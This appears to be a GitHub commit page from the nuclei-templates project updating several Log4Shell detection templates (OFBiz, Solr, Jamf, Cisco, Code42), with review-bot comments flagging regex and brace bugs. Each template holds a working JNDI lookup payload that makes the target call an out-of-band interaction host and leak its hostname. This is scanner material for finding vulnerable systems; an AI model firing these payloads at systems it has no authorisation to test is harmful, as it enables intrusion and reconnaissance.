Merge pull request #7170 from projectdiscovery/update-log4j
Update All Existing Log4j Templatespatch-1
commit
9082cb7329
106
.new-additions
106
.new-additions
|
@ -1,51 +1,55 @@
|
||||||
file/keys/postman-api-key.yaml
|
cves/2017/CVE-2017-16894.yaml
|
||||||
headless/technologies/sap-spartacus.yaml
|
cves/2020/CVE-2020-10199.yaml
|
||||||
http/cves/2017/CVE-2017-17731.yaml
|
cves/2021/CVE-2021-25078.yaml
|
||||||
http/cves/2020/CVE-2020-27481.yaml
|
cves/2021/CVE-2021-35250.yaml
|
||||||
http/cves/2021/CVE-2021-27314.yaml
|
cves/2022/CVE-2022-0747.yaml
|
||||||
http/cves/2021/CVE-2021-27315.yaml
|
cves/2022/CVE-2022-0769.yaml
|
||||||
http/cves/2021/CVE-2021-27316.yaml
|
cves/2022/CVE-2022-0773.yaml
|
||||||
http/cves/2021/CVE-2021-27319.yaml
|
cves/2022/CVE-2022-0846.yaml
|
||||||
http/cves/2021/CVE-2021-27320.yaml
|
cves/2022/CVE-2022-0864.yaml
|
||||||
http/cves/2021/CVE-2021-30175.yaml
|
cves/2022/CVE-2022-1903.yaml
|
||||||
http/cves/2021/CVE-2021-44228.yaml
|
cves/2022/CVE-2022-2219.yaml
|
||||||
http/cves/2022/CVE-2022-24264.yaml
|
cves/2022/CVE-2022-24223.yaml
|
||||||
http/cves/2022/CVE-2022-24265.yaml
|
cves/2022/CVE-2022-25485.yaml
|
||||||
http/cves/2022/CVE-2022-24266.yaml
|
cves/2022/CVE-2022-25486.yaml
|
||||||
http/cves/2022/CVE-2022-24716.yaml
|
cves/2022/CVE-2022-25487.yaml
|
||||||
http/cves/2022/CVE-2022-27984.yaml
|
cves/2022/CVE-2022-25488.yaml
|
||||||
http/cves/2022/CVE-2022-27985.yaml
|
cves/2022/CVE-2022-25489.yaml
|
||||||
http/cves/2022/CVE-2022-3980.yaml
|
cves/2022/CVE-2022-25497.yaml
|
||||||
http/cves/2022/CVE-2022-42095.yaml
|
cves/2022/CVE-2022-27926.yaml
|
||||||
http/cves/2022/CVE-2022-42096.yaml
|
cves/2022/CVE-2022-28032.yaml
|
||||||
http/cves/2022/CVE-2022-4328.yaml
|
cves/2022/CVE-2022-3062.yaml
|
||||||
http/cves/2022/CVE-2022-45037.yaml
|
cves/2022/CVE-2022-37190.yaml
|
||||||
http/cves/2022/CVE-2022-45038.yaml
|
cves/2022/CVE-2022-37191.yaml
|
||||||
http/cves/2022/CVE-2022-46020.yaml
|
cves/2022/CVE-2022-38295.yaml
|
||||||
http/cves/2023/CVE-2023-1020.yaml
|
cves/2022/CVE-2022-38296.yaml
|
||||||
http/cves/2023/CVE-2023-1671.yaml
|
cves/2022/CVE-2022-38467.yaml
|
||||||
http/cves/2023/CVE-2023-20864.yaml
|
cves/2022/CVE-2022-41441.yaml
|
||||||
http/cves/2023/CVE-2023-25135.yaml
|
cves/2022/CVE-2022-42094.yaml
|
||||||
http/cves/2023/CVE-2023-26360.yaml
|
cves/2022/CVE-2022-4321.yaml
|
||||||
http/cves/2023/CVE-2023-27350.yaml
|
cves/2023/CVE-2023-0099.yaml
|
||||||
http/cves/2023/CVE-2023-27524.yaml
|
cves/2023/CVE-2023-22620.yaml
|
||||||
http/cves/2023/CVE-2023-29489.yaml
|
cves/2023/CVE-2023-22897.yaml
|
||||||
http/cves/2023/CVE-2023-29922.yaml
|
cves/2023/CVE-2023-27008.yaml
|
||||||
http/cves/2023/CVE-2023-30210.yaml
|
cves/2023/CVE-2023-27159.yaml
|
||||||
http/cves/2023/CVE-2023-30212.yaml
|
cves/2023/CVE-2023-27179.yaml
|
||||||
http/cves/2023/CVE-2023-31059.yaml
|
cves/2023/CVE-2023-29084.yaml
|
||||||
http/cves/2023/CVE-2023-32235.yaml
|
default-logins/trassir/trassir-default-login.yaml
|
||||||
http/default-logins/powerjob-default-login.yaml
|
exposed-panels/appwrite-panel.yaml
|
||||||
http/default-logins/umami/umami-default-login.yaml
|
exposed-panels/aspect-control-panel.yaml
|
||||||
http/exposed-panels/oracle-opera-login.yaml
|
exposures/logs/yii-error-page.yaml
|
||||||
http/exposed-panels/papercut-ng-panel.yaml
|
misconfiguration/apollo-adminservice-unauth.yaml
|
||||||
http/exposed-panels/proxmox-panel.yaml
|
misconfiguration/default-spx-key.yaml
|
||||||
http/exposed-panels/red-lion-panel.yaml
|
misconfiguration/sql-server-report-viewer.yaml
|
||||||
http/exposed-panels/sophos-web-appliance.yaml
|
misconfiguration/thinkphp-errors.yaml
|
||||||
http/exposures/tokens/postman/postman-key.yaml
|
network/detection/msmq-detect.yaml
|
||||||
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
|
network/enumeration/beanstalk-service.yaml
|
||||||
http/osint/mail-archive.yaml
|
osint/hashnode.yaml
|
||||||
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
|
osint/imgbb.yaml
|
||||||
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
|
osint/rubygems.yaml
|
||||||
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
|
technologies/default-apache-shiro.yaml
|
||||||
http/vulnerabilities/wordpress/wpml-xss.yaml
|
technologies/switch-protocol.yaml
|
||||||
|
vulnerabilities/generic/cache-poisoning-xss.yaml
|
||||||
|
vulnerabilities/huawei/huawei-firewall-lfi.yaml
|
||||||
|
vulnerabilities/others/universal-media-xss.yaml
|
||||||
|
vulnerabilities/wordpress/ldap-wp-login-xss.yaml
|
||||||
|
|
|
@ -55,19 +55,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 2
|
group: 2
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/28
|
# Enhanced by mp on 2022/02/28
|
||||||
|
|
|
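Review bot: The comment on the first regex in this hunk reads "Print extracted … in output", but that entry sits above `extractors:` and so appears to be a matcher, which decides whether the template fires and prints nothing. I would reword it to `# Match callback name: six-digit rand1+rand2 prefix, then ${hostName} and the injection-point label`. The same copied comment is on the matcher regex of the other templates changed in this commit, where it replaces the more accurate "Match for extracted … variable". The hunk starts inside the `http:` block, so the enclosing matcher list is only partly visible.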
@ -22,12 +22,16 @@ info:
|
||||||
shodan-query: http.html:"Apache OFBiz"
|
shodan-query: http.html:"Apache OFBiz"
|
||||||
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
|
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /webtools/control/main HTTP/1.1
|
GET /webtools/control/main HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
|
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -39,13 +43,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
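Review bot: Group numbering in the new extractor regex depends on how many labels `{{interactsh-url}}` expands to, because `([a-zA-Z0-9\.\-]+)` is greedy and accepts dots. With an interaction domain one label longer than the pattern assumes, group 1 would become `<hostName>.cookie` and group 2 the interaction ID, so the "injection point" line in the output would be wrong. Pinning the label this template sends removes that dependency, for example `- '\d{6}\.([a-zA-Z0-9\.\-]+)\.(cookie)\.'` for both extractors. The same holds for the other templates in this commit with their own labels (`uri`, `username`, `accept`, `search`, `name`, `url`). I have not checked which domain shapes the interaction servers in use produce, so treat this as hardening of the report output rather than a confirmed failure.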
@ -24,11 +24,15 @@ info:
|
||||||
shodan-query: http.html:"Apache Solr"
|
shodan-query: http.html:"Apache Solr"
|
||||||
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
|
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 25s
|
@timeout: 25s
|
||||||
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
|
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
attack: clusterbomb
|
attack: clusterbomb
|
||||||
|
@ -52,10 +56,21 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
regex:
|
regex:
|
||||||
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
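Review bot: The new request line has one closing brace too many after the second random value: it is written `%24%7B%3A-{{rand2}}}%7D`, while the first one is `%24%7B%3A-{{rand1}}%7D`. After template substitution a literal `}` remains in front of `%7D`, and if the target treats it as the end of the outer lookup, the name that is resolved stops after the six digits and never carries `${hostName}` or `uri`. The new `\d{6}\.…` matcher would then not match, and a vulnerable instance would go unreported. Change the fragment to `%24%7B%3A-{{rand2}}%7D`.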
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Referer: {{RootURL}}
|
Referer: {{RootURL}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,21 +45,31 @@ http:
|
||||||
words:
|
words:
|
||||||
- "dns"
|
- "dns"
|
||||||
|
|
||||||
- type: regex
|
|
||||||
part: interactsh_request
|
|
||||||
regex:
|
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>Jamf Pro Login</title>"
|
- "<title>Jamf Pro Login</title>"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
@ -22,13 +22,17 @@ info:
|
||||||
shodan-query: title:"CloudCenter Suite"
|
shodan-query: title:"CloudCenter Suite"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 10s
|
@timeout: 10s
|
||||||
POST /suite-auth/login HTTP/1.1
|
POST /suite-auth/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
|
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
|
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
|
||||||
|
@ -43,7 +47,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -55,10 +59,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/22
|
# Enhanced by md on 2023/03/22
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -29,7 +33,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/ccmadmin/showHome.do
|
Referer: {{BaseURL}}/ccmadmin/showHome.do
|
||||||
|
|
||||||
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
|
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,17 +45,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/04
|
# Enhanced by md on 2022/10/04
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
|
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -54,10 +58,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by CS 03/27/2023
|
# Enhanced by CS 03/27/2023
|
||||||
|
|
|
@ -24,10 +24,14 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
|
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -39,13 +43,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +35,7 @@ http:
|
||||||
Referer: {{RootURL}}
|
Referer: {{RootURL}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -48,13 +52,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
